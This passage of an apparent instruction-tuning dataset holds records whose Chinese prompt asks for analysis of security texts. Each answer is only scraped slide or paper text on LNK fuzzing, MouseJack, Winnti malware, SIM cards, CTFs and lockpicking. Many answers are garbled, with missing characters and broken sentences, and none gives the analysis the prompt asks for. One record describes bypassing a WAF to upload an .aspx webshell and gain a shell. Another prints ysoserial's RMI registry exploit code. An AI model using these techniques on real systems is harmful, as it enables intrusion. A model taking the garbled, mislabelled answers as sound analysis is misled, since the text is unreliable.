and get you Pwned  Removable Drives  Remote Share  Sounds cool, lets fuzz this DEMO - LNK DoS Windows LNK Format LNK is  REALLY  Complicated  On Linux / macOS  Its really hard to remember the order (A) ln -s <src> <dst> (B) ln -s <dst> <src> LNK is  REALLY  Complicated  But on Windows  Its harder SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO] [STRING_DATA] *EXTRA_DATA Windows Shell Link File Format ShellLinkHeader LinkTargetIDList LinkInfo StringData ExtraData HeaderSize LinkCLSID LinkFlags FileAttributes CreationTime AccessTime WriteTime FileSizes IconIndex ShowCommand HotKey HasLinkTargetIDList HasLinkInfo HasName HasRelativePath HasWorkingDir HasArguments HasIconLocation 0x4C 00021401-0000-0000-C000-000000000046 Windows Shell Link File Format ShellLinkHeader LinkTargetIDList LinkInfo StringData ExtraData Windows Shell Link File Format ShellLinkHeader LinkTargetIDList LinkInfo StringData ExtraData Windows Folder -> C:\\Windows\\ User Folder -> C:\\Users\\HITCON\\ Recycle Bin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMouseJack, KeySnier and Beyond: Keystroke Sniffing and Injection Vulnerabilities in 2.4GHz Wireless Mice and Keyboards Marc Newlin marc@bastille.net @marcnewlin August 7, 2016 v0.2 Abstract What if your wireless mouse or keyboard was an eective attack vector? Research reveals this to be the case for non-Bluetooth wireless mice and keyboards from Logitech, Microsoft, Dell, Lenovo, Hewlett-Packard, Gigabyte, Amazon, Toshiba, GE, Anker, RadioShack, Kensington, EagleTec, Insignia, ShhhMouse, and HDE. A total of 16 vulnerabilities were identified and disclosed to the aected vendors per our disclosure pol- icy[1]. The vulnerabilities enable keystroke sniffing, keystroke injection, forced device pairing, malicious macro programming, and denial of service. 1 Contents 1 Introduction 4 2 Overview of Vulnerabilities 4 3 Transceivers 5 3.1 Nordic Semiconductor nRF24L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 3.2 Texas Instruments CC254X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.3 MOSART Semiconductor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.4 Signia SGN6210 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.5 GE Mystery Transceiver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 4 Research Process 7 4.1 Software Defined Radio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 4.2 NES Controller . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.3 CrazyRadio PA Dongles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.4 Fuzzing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4.5 First Vulnerability and Beyond . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 5 Lo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnat smashdemo 0x00 1. httpstls sessionid 2. sessionidpayload 3. sessionid 4. 5. sessionidtls 6. sessionid 7. tcp windowsessionid 0x01 1. scapytcpack 2. https://github.com/tlsfuzzer/tlslite-ng wendellpytls tlslite/tlsconnection.pypip/ usr/local/lib/python3.8/dist- packages/tlslite/tlsconnection.py httpshttpspayload payload \\nEPRT |1|IP|port| tcpwindow 32 0x02 demo 1. tlssessionidhttps21 2. sessionid302sessionid21 3. tcp window21httpsscapy 4. scapy21tcpsyn+acktcp windowpsh windowpshackseqackftp alg tips javahttpconnectionrunrunjava sessionid12httpstcp 21302kill21https 21scapy21https21 sessionid21 scapyssrf21 0x03 httpsservergithub To run an HTTPS server with less typing, run ./tests/httpsserver.sh. https://github.com/tlsfuzzer/tlslite-ng/blob/master/tests/httpsserver.sh httpsserverscript/tls.pyurl ipurl natsmash-tlsserver1.py 21https serverdo_GET #!/usr/bin/python3 # Authors: # Trevor Perrin # Marcelo Fernandez - bugfix and NPN support # Martin von Loewis - python 3 port # # See the LICENSE file for legal information regarding use of this file. from __future__ import print_function import sys import os import os.path import socket import time import getopt import binascii import _thread from scapy.all import * try: import httplib from SocketServer import * from BaseHTTPServer import * from SimpleHTTPServer import * except ImportError: # Python 3.x from http import client as httplib from socketserver import * from http.server import * from http.server import SimpleHTTPRequestHandler if __name__ != \"__main__\": raise \"This must be run as a command, not used as a module!\" from tlslite.api import * from tlslite.constants import CipherSuite, HashAlgorithm, SignatureAlgorithm, \\ GroupName, SignatureScheme from tlslite import __version__ from tlslite.utils.compat import b2a_hex from tlslite.utils.dns_utils import is_valid_hostname try: from tack.structures.Tack import Tack except ImportError: pass def printUsage(s=None): if s: print(\"ERROR: %s\" % s) print(\"\") print(\"Version: ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpectra New Wireless Escalation Targets Jiska Classen Secure Mobile Networking Lab - SEEMOO Technische Universität Darmstadt, Germany Francesco Gringoli Dept. of Information Engineering University of Brescia, Italy 2 Motivation 3 When you got Bluetooth on-chip RCE... 35C3 Talk: https://media.ccc.de/v/35c3-9498-dissecting_broadcom_bluetooth, Frankenstein Fuzzer: https://github.com/seemoo-lab/frankenstein 4 ...but Wi-Fi has more privileges. But its connected via UART! Can you pop calc? 5 Lets break inter-chip separation! 6 Spectra: SpeculativeSpectrum Transmission  Wi-Fi, Bluetooth, and even LTE share frequencies in the 2.4 GHz spectrum.  They cause interference in small devices like smartphones.  Wireless combo chip performance optimization: enhanced coexistence mechanisms.  Observable side effects of transmission delays and coordination lead to side channels.  Attackers require code execution privileges, but they can escalate between wireless cores without further checks by the operating system. SPECTRA 7 Wireless Architecture (iOS) 8 Spectra Impact 1. Denial of Service One wireless core denies transmission to the other core. 2. Information Disclosure One wireless core can infer data or actions of the other core. 3. Code Execution One wireless core can execute code within the other core. 9 Broadcom Coexistence (and Cypress) 10 Broadcom: ~ 1 Billion Devices  Apple  All iPhones, MacBooks, iMacs, older Apple Watches  Samsung  Samsung Galaxy S and Note series in Europe  Google  Only older devices, e.g., Nexus 5/6P  Raspberry Pi  IoT devices  Fitbit Ionic ...and no firmware checks. A perfect prototyping platform \\o/ 11 Coexistence: Escalation within the chip From the BCM4339 datasheet (Google Nexus 5). 12 AN214852 - Collaborative Coexistence Interface Between Cypress-to-Cypress Solutions and Cypress-to-third-party Chips By the way, throughput really sucks with ECI disabled. You cannot stream a video with Wi-Fi and listen to it with your Bluetooth headset. 13 Serial Enhan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nack === 比grep好用的文本搜索工具 ## 安装 ```shell # ubuntu下要安装ack-grep因为在debian系中ack这个名字被其他的软件占用了 sudo apt-get install ack-grep # alpine Linux-apk软件包管理器 安装 ack apk install ack ``` ## 参数 这些参数在linux上的适用频率是相当高的尤其是你用vim做为IDE的话 ```shell -c(统计)/ -i(忽略大小)/ -h(不显示名称)/ -l(只显文件名)/ -n(加行号)/ -v(显示不匹配) ``` ## 特点 ack官网列出了这工具的5大卖点 1. 速度非常快,因为它只搜索有意义的东西 2. 更友好的搜索忽略那些不是你源码的东西 3. 为源代码搜索而设计用更少的击键完成任务 4. 非常轻便移植性好 5. 免费且开源 ## 实例 在记忆的时候大体上可以分为这几个部分 > Searching 代码搜索 > Search output 搜索结果处理 > File presentation 文件展示 > File finding 文件查找 > File inclusion/exclusion 文件过滤 grep常用操作 ```shell grep -r 'hello_world' # 简单用法 grep 'hello_world' . # 简单正则 ls -l | grep .py # 管道用法 ``` ### Searching 简单的文本搜索默认是递归的 ``` ack-grep hello ack-grep -i hello ack-grep -v hello ack-grep -w hello ack-grep -Q 'hello*' ``` ### Search File 对搜索结果进行处理比如只显示一个文件的一个匹配项或者xxx ```shell ack-grep --line=1 # 输出所有文件第二行 ack-grep -l 'hello' # 包含的文件名 ack-grep -L 'print' # 非包含文件名 ``` ### File presentation 输出的结果是以什么方式展示呢这个部分有几个参数可以练习下 ```shell ack-grep hello --pager='less -R' # 以less形式展示 ack-grep hello --noheading # 不在头上显示文件 ack-grep hello --nocolor # 不对匹配字符着色 ``` ### File finding 没错它可以查找文件以省去你要不断的结合find和grep的麻烦虽然在linux的思想是一个工具做好一件事 ```shell ack-grep -f hello.py # 查找全匹配文件 ack-grep -g hello.py$ # 查找正则匹配文件 ack-grep -g hello --sort-files # 查找然后排序 ``` ### File Inclusion/Exclusion 文件过滤个人觉得这是一个很不错的功能如果你曾经在搜索项目源码是不小心命中日志中的某个关键字的话你会觉得这个有用 ```shell ack-grep --python hello # 查找所有python文件 ack-grep -G hello.py$ hello # 查找匹配正则的文件 ``` ## 参考资料 - [ack官网](https://beyondgrep.com/)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKC n 陈愉鑫 第五代加固技术 ARM代码虚拟化保护技术 目录 CONTENTS PART 01 Android 平台加固技术概述 PART 02 什么是虚拟机保护技术 PART 03 VYD 指令集设计 PART 04 VYD 虚拟机设计 PART 05 VYD 编译器设计 PART 06 ARM VM的问题 PART 00 个人简介 知乎 无名侠 专栏大话二进制安全 知道创宇 IA 实验室Android 病毒分析 i春秋特种行业逆向分析线下讲师 我们为什么要加固 PART 01 A d id 平台加固技术概述 1.保护核心代码防止被逆向,泄密 2.防止营销作弊 3.防止代码被修改 4 加固技术的发展历史 PART 01 A d id 平台加固技术概述 第一代 自定义ClassLoader 第二代 核心封装到So库方法抽取反调试 第三代 ELF变形Ollvm 混淆 多进程保护 第四代 DEX虚拟化保护 第五代 ARM 虚拟化保护 PART 02 什么是虚拟化保护技术 Thumb 指令 ARM 指令 x86 指令 MIPS 指令 编译器 字节码 Mov R1,#2 Mov R2,#3 Add R0,R1,R2 编译 vMov R1,2 vMov R2,3 vMov R20,R1 vAdd R20,R2 vAdd R0,R20 VM  PART 02 什么是虚拟化保护技术 出自加密与解密 PART 02 什么是虚拟化保护技术 - 如何设计一个虚拟机 - 用什么语言来开发虚拟机 - 如何对编译后的ELF文件中指定函数进行虚拟化 - 如何设计一个编译器 添加程序头 表 写入VM解 释器代码 抽取虚拟化 函数ARM 代码 编译ARM 代码并写入 字节码到新 节表 在原函数代 码上插入 Vm调度入 口代码 PART 02 什么是虚拟化保护技术 几大模块 VM 虚拟机核心 VM 编译器 VM 链接器 VM 各种stub ARM 指令集的一些特性 PART 03 VYD 指令集设计 1. 长度不一ThumbThumb-2 ARM 2. 条件执行 3. 多级流水线Pc指向问题 4. 多寄存器寻址 5. 移位寻址 PART 03 VYD指令集设计 寄存器结构 VYD寄存器 ARM 对应寄存器 用途 vR0-vR12 R0-R12 通用寄存器 vFp R11 栈帧寄存器 vSP R13 栈指针寄存器 vLR R14 链接寄存器 vPC1 R15 ARM指令同步PC vPC / VYD 指令同步寄存器 v16-v32 / 临时寄存器 Flags / 标志寄存器 PART 03 VYD指令集设计 VYD 虚拟机的指令编码格式 PART 03 VYD指令集设计 VYD 虚拟机的指令编码格式 寻址支持方式 PART 03 VYD 指令集设计 1. 对寻址地址表达式进行编译 例如 str fp, [sp, #-4]! 编译为 vMov r16,sp vAdd r16,-4 vStr fp,[r16] vMov sp,r16 PART 03 VYD 指令集设计 标志寄存器与逻辑判断 B类跳转指令 vJmp condOffset/Rx 带条件的非B跳转指令 -> 编译 -> 多条VYD指令 moveq r0r1 -> vJne s vMov r0,r1 s: xxxxx PART 04 VYD虚拟机设计 VYD 指令解码与执行过程 取码 译码 验证 执行 VPC递增 Function: vm_get_ins Function:vm_run PART 04 VYD虚拟机设计 VYD 辅助解析指令 PART 04 VYD虚拟机设计 VYD 虚拟机对于寄存器的定义 PART 04 VYD虚拟机设计 VYD 虚拟机的指令OPCODE Opcode 为enum自动生成 PART 04 VYD虚拟机设计 执行模型 1.Handler表 2.Switch PART 04 VYD虚拟机设计 标志位的设置 PART 05 VYD 编译器设计 编译器工作流程 1.反汇编ARM 2.生成中间代码 3.处理定位 4.生成opcode PART 05 VYD 编译器设计 如何反汇编arm Capstone 跨平台开源反汇编引擎 Capstone 支持 Arm, Arm64 (Armv8), M68K, Mips, PowerPC, Sparc, SystemZ, TMS320C64X, XCore& X86 (incl ude X86_64) 提供了多种语言的编程接口 Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHoney Onions: Exposing Snooping Tor HSDir Relays Guevara Noubir, Amirali Sanatinia College of Computer and Information Science Northeastern University, Boston, USA {noubir,amirali}@ccs.neu.edu AbstractTor is a widely used anonymity network that protects users privacy and identity from corporations, agencies and governments. However, Tor remains a practical system with a variety of limitations which can be subverted [1]. In particular, Tors security relies on the fact that a substantial number of its nodes do not misbehave. Previous work showed the existence of malicious participating Tor relays. For example, there are some Exit nodes that actively interfere with users traffic and carry out man-in-the-middle attacks. In this work we expose another category of misbehaving Tor relays (HSDirs), that are integral to the functioning of the hidden services and the dark web. The HSDirs act as the DNS directory for the dark web. Because of their nature, detecting their malicious intent and behavior is much harder. We introduce, the concept of honey onions (honions), a framework to detect misbehaving Tor relays with HSDir capability. By setting up and deploying a large scale honion over Tor for more than 72 days, we are able to obtain lower bounds on misbehavior among HSDirs. We propose algorithms to both estimate the number of snooping HSDirs and identify them, using optimization and feasibility techniques. Our experimental results indicate that during the period of our work at least 110 such nodes were snooping information about hidden services they host. We reveal that more than half of them were hosted on cloud infrastructure and delayed the use of the learned information to prevent easy traceback. Furthermore, we provide the most likely geolocation map of the identified snooping Tor HSDirs. I. HONION GENERATION & DETECTION In this work, we introduce the concept of honey onions (honions), a framework to expose when a Tor relay with HSDir capability has been modified to snoop", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CyberTank Telework Network ## Breakout (100 points) > CyberTank engineers can now work from home! The security team will soon realize shared systems can be hazardous... > > URL: https://52.50.31.19/ - You need to register and then use RDWeb to log in. The flag is in the root directory. > > Flag format: CTF{32-hex} Visiting the website, we get a form that allows us to sign up to the RDP service and get a username and password: ``` Request remote access As our valued employee, please request remote access to CyberTank systems here: Success! Your account has been activated. Username: CYBERTANK\\teleworker54 Password: N+m6@j8 ``` We can then login to an RDWeb service using these credentials. We receive access to: ![](images/rdweb.png) Which is a `*.rdp` file, used to launce a remote desktop session. Using this file we can launch a remote application locally via the RDP protocol: ![](images/rdpweb2.png) Once the app launces, we actually get the CyberTank Window Controller application from [the reversing challenge](CyberTank_Window_Controller.md) running directly in our OS. An RDP file is actually a text file: ``` redirectclipboard:i:1 redirectprinters:i:1 redirectcomports:i:0 redirectsmartcards:i:1 devicestoredirect:s:* drivestoredirect:s:* redirectdrives:i:1 session bpp:i:32 prompt for credentials on client:i:1 span monitors:i:1 use multimon:i:1 remoteapplicationmode:i:1 server port:i:3389 allow font smoothing:i:1 promptcredentialonce:i:0 videoplaybackmode:i:1 audiocapturemode:i:1 gatewayusagemethod:i:0 gatewayprofileusagemethod:i:1 gatewaycredentialssource:i:0 full address:s:EC2AMAZ-GKADDAA.CYBERTANK.TLV alternate full address:s:52.50.31.19 alternate shell:s:||CyberTankWindowApp remoteapplicationprogram:s:||CyberTankWindowApp remoteapplicationname:s:CyberTank Window Controller remoteapplicationcmdline:s: workspace id:s:EC2AMAZ-GKADDAA.cybertank.tlv use redirection server name:i:1 loadbalanceinfo:s:tsv://MS Terminal Services Plugin.1.CyberTankApps ``` We can modify the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLockpicking Forensics datagram datagram.layerone@gmail.com Defcon 17, 2009 Agenda  How locks/picks work  Normal wear  Lock Analysis  Key Analysis  Investigative process Destructive entry still #1! How Locks Work How Locks Work How Locks Work How Locks Work Pin Binding Pin Binding Picking a Lock Apply tension Find binding pin Raise to shear line Repeat Picking a Lock Forensic Locksmithing  1976 - Art Paholke, Chicago PD  Locks, Safes, Security (Tobias)  Werkzeugspur (Goth)  Impressioning (Diederichsen)  Determine method of entry  Identify evidence, tool marks, techniques  Provide expert testimony Pins  New Pins  New Key - New Plug - New Pins  100 uses Pins  100 uses Plug  100 uses Key  100 Uses Pins  1,500 uses (pin 1) Pins  1,500 uses (pin 5) Key  1,500 uses Plug  1,500 uses Pins - 5,000 uses (pin 1) Pins - 5,000 uses (pin 5) Plug  5,000 uses Plug  5,000 uses Plug  5,000 uses Key - 5,000 uses Forensic Analysis Components (pins, springs, etc) Plug Cylinder Cam/Actuator Keys Bolt Door, window, wall, etc Lockpicking Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Pins Lockpicking - Plug Lockpicking - Plug Lockpicking - Plug Lockpicking - Plug Lockpicking - Plug Lockpicking - Plug Lockpicking - Tension Lockpicking - Tension Lockpicking - Tension Lockpicking - Cam Lockpicking - Cam Lockpicking - Medecoder Pick Guns Pick Guns - Pins Pick Guns - Pins Pick Guns - Cam Pick Guns - Cam Key Bumping Key Bumping Key Bumping - Pins Key Bumping - Pins Key Bumping - Pins Key Bumping - Pins Key Bumping - Pins Key Bumping - Pins Key Bumping - Plug Key Bumping - Face Key Bumping - Face Key Bumping - Plug Impressioning Impressioning - Manipulation Impressioning - Manipulation Impressioning - Plug Impressioning  UV residue Impressioning  UV Residue Decoding  Depends on technique  Covert vs. surreptitious  Decoder pick  Manipulation  V", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Web Apps Def Con 11 version Copyright 2002-2003 - David Rhoades slide 2 Warning  Hazards to your Freedom  Unauthorized access to systems & data is illegal in most places.  Get permission in writing before performing scans, audits, assessments, etc!  For details see http://www.lightlink.com/ spacenka/fors/ Copyright 2002-2003 - David Rhoades slide 3 This is not a Drill  True Stories  The vulnerabilities you are about to see are real, only the names have been changed to protect the vulnerable.  Discovered over the past several years by the author during AUTHORIZED security assessments of customers  consumer banking, credit cards, travel reservations, B2B banking, 401K, stock broker, project collaboration & document sharing Copyright 2002-2003 - David Rhoades slide 4 Course Purpose  We will cover  various web application weaknesses  tools & methods to find and exploit them  We will not cover  comprehensive audit/assessment methodologies  all tools/techniques  solutions for holes seen Copyright 2002-2003 - David Rhoades slide 5 About the Instructor/Author  David Rhoades  PSU - B.S. Computer Engineering  Info Sec since 1996  david.rhoades@mavensecurity.com  Maven Security Consulting, Inc.  www.MavenSecurity.com (Im the one on the right.) Copyright 2002-2003 - David Rhoades slide 6 Course Agenda  The Problem  Tools of the Trade (i.e. warez)  Points of Attack  live demos  Further Resources Copyright 2002-2003 - David Rhoades slide 7 The Problem (Cant we all just get along? No!)  Web sites are hacked for various reasons:  political, revenge, fame, fortune, fun (genetic?, vitamin deficiency?)  Not just web sites - applications too  Hotmail, CD Universe, shopping carts  See for the latest casualties http://www.securitytracker.com/archives/category/4.html  SANS/FBI  The Twenty Most Critical Internet Security Vulnerabilities  Web servers are at the top of the list, see http://www.sans.org/top20/  Vulnerability stats http://www.securitytracker.com/learn/statistics.html  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\naptitude === Debian Linux系统中软件包管理工具 ## 补充说明 **aptitude命令** 与apt-get命令一样都是Debian Linux及其衍生系统中功能极其强大的包管理工具与apt-get不同的是aptitude在处理依赖问题上更佳一些举例来说aptitude在删除一个包时会同时删除本身所依赖的包这样系统中不会残留无用的包整个系统更为干净它通过文本操作菜单和命令两种方式管理软件包 ### 语法 ```shell aptitude(选项)(参数) ``` ### 选项 ```shell -h显示帮助信息 -d仅下载软件包不执行安装操作 -P每一步操作都要求确认 -y所有问题都回答yes -v显示附加信息 -u启动时下载新的软件包列表 ``` ### 参数 操作命令用户管理软件包的操作命令 ### 实例 以下是我总结的一些常用aptitude命令仅供参考 ```shell aptitude update # 更新可用的包列表 aptitude upgrade # 升级可用的包 aptitude dist-upgrade # 将系统升级到新的发行版 aptitude install pkgname # 安装包 aptitude remove pkgname # 删除包 aptitude purge pkgname # 删除包及其配置文件 aptitude search string # 搜索包 aptitude show pkgname # 显示包的详细信息 aptitude clean # 删除下载的包文件 aptitude autoclean # 仅删除过期的包文件 ``` 当然你也可以在文本界面模式中使用 aptitude", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWinnti%Polymorphism% Takahiro%Haruyama% Symantec% Who%am%I?%  Takahiro%Haruyama%(@cci_forensics)%  Reverse%Engineer%at%Symantec%  Managed%Adversary%and%Threat%Intelligence%(MATI)%  https://www.symantec.com/services/cyber-security-services/ deepsight-intelligence/adversary%  Speaker%  BlackHat%Briefings%USA/EU/Asia,%SANS%DFIR%Summit,% CEIC,%DFRWS%EU,%SECURE,%FIRST,%RSA%Conference%JP,% etc% 2% Motivation%  Winnti%is%malware%used%by%Chinese%threat%actor%for% cybercrime%and%cyber%espionage%since%2009%  Kaspersky%and%Novetta%published%good%white%papers% about%Winnti%[1]%[2]%  Winnti%is%still%active%and%changing%  Variants%whose%behavior%is%different%from%past%reports%  Targets%except%game%and%pharmaceutical%industries%  Id%like%to%fill%the%gaps% 3% Agenda%  Winnti%Components%and%Binaries%  Getting%Target%Information%from%Winnti% Samples%  Wrap-up% 4% Winnti%Components%and%Binaries% 5% Winnti%Execution%Flow% % 6% Dropper Engine 2. run 3. load & run Service- with-config Worker- with-config (encrypted) 1. drop 5. load memory-resident or omitted 4. decrypt & run rootkit drivers C2-server 6. connect to C2 New%Findings% % 7% Dropper Engine other, malware,family 2. run 3. load & run Service, with,config Worker, with,config (encrypted) 1. drop 5. load decrypt & run (rare samples only) memory-resident or omitted or file client,malware?,on, other,machines 4. decrypt & run rootkit drivers C2,server 6. connect to C2 connected through covert channel SMTP supported Dropper%Component%  extract%other%components%from%inline%DES-protected%blob%  the%dropped%components%are%%  service%and%worker%  additionally%engine%with%other%malware%family%(but%that%is%rare)%  the%password%is%passed%from%command%line%argument%  Some%samples%add%droppers%configuration%into%the%overlays%of%the% components%  run%service%component%  /rundll32.exe%\"%s\",%\\w+%%s/%  the%export%function%name%often%changes%  Install,%DlgProc,%gzopen_r,%Init,%sql_init,%sqlite3_backup_deinit,%etc...% 8% Service%Component%  load%engine%compon", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 前 如有技术交流或渗透测试/代码审计/红队向培训/红蓝对抗评估需求的朋友 欢迎联系QQ/VX-547006660 0x01 起因 某项靶标是个员管理系统通过webpack暴露的接 我们成功找到了个未鉴权的密码修改接通过fuzz 我们获取到了该接的参数username与password并成功修改了admin账号密码进后台 在个任意上传的后台功能点我们遇到了塔WAF+流量检测设备于是便有了本 0x02 摸清检测规则 众所周知塔公司的WAF+流量检测设备还是较逼的我直接尝试上传个免杀webshell毫疑问直接 GG了 经过测试上传害内容1111但件名为XXX.aspx也会被拦截 发现塔对form表单的件名和件内容都有检测我们必须得把这俩检测都安排掉才能成功上传 下简述下对抗思路 0x03 件名检测根据.NET上传匹配件名特性绕WAF(骗) .NET中常context.Request.Files处理件上传表单 其在匹配上传件名时只匹配Content-Disposition:后的filename=xxxx这就给了我们很的绕WAF操作空 间可以直接在Content-Disposition中注脏数据来扰乱WAF的检测 这我去掉分号并使emoji宽字节数据扰乱waf 如图使害数据成功上传aspx件 0x04 件内容检测双图夹恶意代码(偷袭) 前既然直接传免杀Shell不我测试了加图头尝试绕过检测 例如 发现并没有什么卵都GG了 JPEG (jpg)件头FFD8FF PNG (png)件头89504E47 GIF (gif)件头47494638 后根据.NET特性使了UTF-16编码也被拦截了看来塔对编码这块有所防范 今天是肯德基疯狂星期四突然个想法在我脑中闪过我们能不能在万绿丛中夹带点红呢 我们来试试汉堡包法 选取两张正常图数据中间夹带上我们的恶意代码 如图成功上传带有恶意代码的aspx件塔就此告破~ 翻了下后台的图路径成功拼接出shell的url路径 蚁剑加密下流量成功Getshell 0x05 总结 善编码宽字节熟知每种开发语的特性是绕过WAF不可或缺的基本功 特殊情况下思路灵活可以出奇制胜~", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n闲来无事反制ysoserial ( 之前分析RMI的时候发现对于客户端的反序列化攻击都是没有被修复的也就是说如果调用了原生jdk 的rmi客户端相关调用连接恶意JRMP服务端就会触发反序列化 攻击客户端的场景不多除了反打服务器打真正客户端的场景可能就是反制了或者叫蜜罐也行那 么看下常见的攻击RMI的安全工具有没有这种问题 ysoserial 上来看看Java安全神器ysoserial里和RMI有关的expyso里面大部分都是本地生成payload但也有一 些打远程服务的比如RMIRegistryExploit public static void main(final String[] args) throws Exception { final String host = args[0]; final int port = Integer.parseInt(args[1]); final String command = args[3]; Registry registry = LocateRegistry.getRegistry(host, port); final String className = CommonsCollections1.class.getPackage().getName() + \".\" + args[2]; final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className); // test RMI registry connection and upgrade to SSL connection on fail try { registry.list(); } catch(ConnectIOException ex) { registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory()); } // ensure payload doesn't detonate during construction or deserialization exploit(registry, payloadClass, command); } public static void exploit(final Registry registry, final Class<? extends ObjectPayload> payloadClass, final String command) throws Exception { new ExecCheckingSecurityManager().callWrapped(new Callable<Void>() {public Void call() throws Exception { ObjectPayload payloadObj = payloadClass.newInstance(); Object payload = payloadObj.getObject(command); String name = \"pwned\" + System.nanoTime(); Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class); try { registry.bind(name, remote); } catch (Throwable e) { e.printStackTrace(); } Utils.releasePayload(payloadObj, payload); return null; }}); } 看到了registry.list和registry.bind这两处就是调用的原生的RegistryImpl_Stub实际上只要是调用了 任意一个stub都会触发UnicastRef#invoke->StreamRemoteCall#executeCall导致反序列化很明显这 里就有反序列化点了 调用链自然也没啥问题毕竟ysoserial算是天底下反序列化链最多的地方了 所以攻击也很简单就用JRMPListener起一个恶意客户端原汤化原食了属于是 然后客户端扮演jb小子看见1099开了直接打 喜提计算器 很奇怪的是在另一个攻击rmi的脚本ysoserial/exploit/JRMPClient.java里 注释里特意写了not deserializing anything说明开发者", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKarl Koscher  @supersat Eric Butler  @codebutler Writing, building, loading, and using code on SIM Cards.  Toorcamp 2012!  Hacker camp on WA coast  Project: Run a GSM network.  My task: Procure SIM Cards. 2  Subscriber Identity Module  Contains an identity (IMSI) and symmetric key (Ki).  Secure (key cant be extracted; cant be cloned)  Used by GSM carriers and now LTE (Verizon)  Can also run apps?! 3  Long ago  Applications live on your SIM card.  Phones are dumb hosts  UI and connectivity only.  Telcos own the SIMs, so they control the applications.  Mostly obsolete today? 4 Still around decade later, mostly unchanged. 5 SIM Cards are mysterious little computers in your pocket that you dont control. 6  Needed SIMs for Toorcamp anyway, why not get SIMs that supported apps?  This ended up taking many months.  Very little documentation about all this.  After lots of research, finally figured out how to program the *#$!ing things.  Learn from our misery. 7 8 Chip Field Description Generic Description 64K JavaCard 2.1.1 WIB1.3 USIM Platform Atmel AT90SC25672RU CPU Architecture 8-bit AVR Technology 0.15uM CMOS ROM 256KB ROM Program Memory Non-volatile memory 72 KB EEPROM RAM 6 KB Internal operating frequency Between 20 & 30 MHz Endurance Typically 500 000 write/erase cycles 9  Runs on SIM card CPU, separate from phone.  Connected directly to baseband.  Can be silently remotely installed (by carrier).  Supported by most carrier SIMs.  Cards support multiple apps, selected by AIDs  Apps managed by a master card manager app  GSM SIM is actually just an applet on a UICC (the physical card). 10  Rudimentary UI  display text, menus, play tones, read input.  Works with most modern smartphones.  Dumbphones too.  Launch URLs.  Send SMSes, initiate calls, initiate and use data services.  Receive and act on events, such as call connected, call disconnected, etc.  Interact with the rest of the SIM card.  Run arbitrary AT commands on the phone. 11 12  Not very common in US  But used w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmacterminalrce 0x00 https://mp.weixin.qq.com/s/xqoylh0j0Ny_FL4PlkwH-Q terminal terminal 0x01 mac /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/ lsregister -dump > dumpfile dumpfile commandtoolterminal terminalterminalterminalsetting pocterminalsetting 0x02 poc pocsettingterminal preference run command settingpoc.terminal plistappinfo.plist 0x03 terminaliterm2 itermprofilejson iterm.itsitermpython 1. iterm 2. xxx.its 3. xxx.itsiterm2 4. iterm2 appscript", "category": "text_analysis", "source": "security_papers"}
